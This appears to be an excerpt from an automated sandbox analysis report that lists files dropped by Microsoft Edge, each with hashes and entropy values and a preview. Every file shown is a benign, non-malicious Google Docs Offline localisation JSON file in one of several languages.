                                                                                                                                                                            Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1898
                                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2766
                                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):978
                                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):907
                                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1337
                                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2846
                                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1320
                                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):884
                                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                            MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                            SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                            SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                            SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):980
                                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                            MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                            SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                            SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                            SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1941
